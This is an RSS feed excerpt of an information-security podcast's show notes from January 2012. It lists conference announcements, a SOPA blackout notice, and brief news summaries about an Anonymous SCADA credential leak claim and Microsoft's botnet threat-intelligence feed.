<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">More than 150 people attended the Law School event, which was &ldquo;not meant to give equal time to both sides,&rdquo; according to Falzone. &nbsp;The audience did include two representatives from the Motion Picture Association of America, supporters of SOPA and PIPA, who spoke up during a question and answer session.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There were things about this bill that people in Silicon Valley needed to know &ndash; that is lawyers, entrepreneurs and technology people,&rdquo; Falzone said. &ldquo;Our goal was to put together an array of people who could speak to each one of those sets of considerations.&rdquo;</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">January 18, 2012, is SOPA Blackout Day!. &nbsp;This is an attempt to show the effect that SOPA would have numerous sites if SOPA were to be passed by shutting down the site from 8 am to 8 pm Eastern Standard Time (6:30 pm &#8211; 6:30 am Indian Standard Time). &nbsp;We will be broadcasting on the 18th, but visitors to our site see a simple message about how the PIPA/SOPA legislation would shut down sites like ours.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-567-friday-13th-facebook-security-scam-cyber-insurance-sykipot-when-your-google-skills-fail-sopa-soundoff/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3368/0/infosec-daily-podcast-episode-567.mp3" length="22172670" type="audio/mpeg" />
		<itunes:duration>0:46:09</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 567 for January 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why d[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 567 for January 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Anti PIPA/SOPA Meetup
	Meetup Groups across the country are mobilizing to help stop
	SOPA and PIPA, as we will very potentially see PIPA&#39;s passage
	in the next two weeks if we don&#39;t act.
	We at Meetup HQ are alerting members of the New York Tech
	community about a chance to organize together. The NY Tech
	Meetup, New York&#39;s largest Tech Meetup, has scheduled an
	emergency Meetup on Wednesday, January 18. In order to build
	critical mass and maintain an organized event *please RSVP in
	the NY Tech Meetup* if you want to participate.
	Go here to RSVP: http://www.meetup.com/ny-tech/events/47879702/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	ht[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 566 &#8211; SCADA, MDCU, Sniffing Playbook, SSIDs, DNSSEC &amp; SOPA</title>
		<link>http://www.isdpodcast.com/episode-566-scada-mdcu-sniffing-playbook-ssids-dnssec-sopa</link>
		<comments>http://www.isdpodcast.com/episode-566-scada-mdcu-sniffing-playbook-ssids-dnssec-sopa#comments</comments>
		<pubDate>Fri, 13 Jan 2012 02:03:44 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3365</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 566 for January 12, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Information Security Blogger Awards 2012 Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 566 for January 12, 201<span style="font-size:16px;">2. &nbsp;</span></span><span style="font-size:16px;"><span style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255); font-weight: bold; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.</span></span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></div>
<p><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br />
	</span><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<div dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.v3.co.uk/v3-uk/news/2137158/anonymous-targets-israel-publishing-scada-log-details"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.v3.co.uk/v3-uk/news/2137158/anonymous-targets-israel-publishing-scada-log-details</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hacktivist group Anonymous has released what it claims to be a series of log-in details for Israeli SCADA systems, in what could be retaliation for Tel Aviv&#39;s hardline reaction to the recent mass credit card hack on thousands of its citizens.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The new @FuryOrAnon account, which has been vouched for by one of the group&#39;s most prominent Tweeters, @AnonymouSabu, posted a link to the Pastebin page on Twitter on Wednesday.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Who wanna have some fun with israeli scada systems&#8230;&quot; noted the tweet.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Pastebin page in question contains what it claims to be a list of ten IP addresses for Israeli SCADA systems as well as log-in details.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The timing of the release of these details comes just a couple of days after Israeli deputy foreign minister Danny Ayalon likened those who recently hacked the bank accounts of thousands of Israeli citizens to terrorists.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Israel has active capabilities for striking at those who are trying to harm it and no agency or hacker will be immune from retaliatory action,&quot; he&#39;s reported to have said.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Maintaining the pressure on the country&#39;s leaders, @anonymouSabu published a series of tweets on Thursday with the #fuckisrael hashtag.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://threatpost.com/en_us/blogs/microsoft-readying-real-time-hosted-threat-intelligence-feed-011112"><span style="font-size:15px;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/microsoft-readying-real-time-hosted-threat-intelligence-feed-011112</span></a></div>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has proven that it can take down huge, global botnets like Kelihos, Rustock and Waldec. Now the company is ready to start making the data it acquires in those busts available to governments, law enforcement and customers as a real time threat intelligence feed.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Representatives from the Redmond, Washington software maker told an audience at the International Conference on Cyber Security (ICCS) here that it was testing a new service to distribute threat data from captured botnets and other sources to partners, including foreign governments, Computer Emergency Response Teams (CERTs) and private corporations.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We collect a tremendous amount of data from our global assets,&quot; said T.J. Campana, a Senior Program Manager in Microsoft Digital Crimes Unit (DCU). Now the company is now working on a way to get slices of that information to its partners, including ISPs, CERTs, government agencies and private companies, based on their need, he said.</span></div>
<p>&nbsp;</p>
<div dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft is beta testing the system internally in recent months. &nbsp;Campana described it as a 70-node cluster running the Apache Hadoop framework on top of Windows Server. It currently stores data culled from the Kelihos botnet in September, 2011 and other sources.</span></div>
<p>&nbsp;</p>
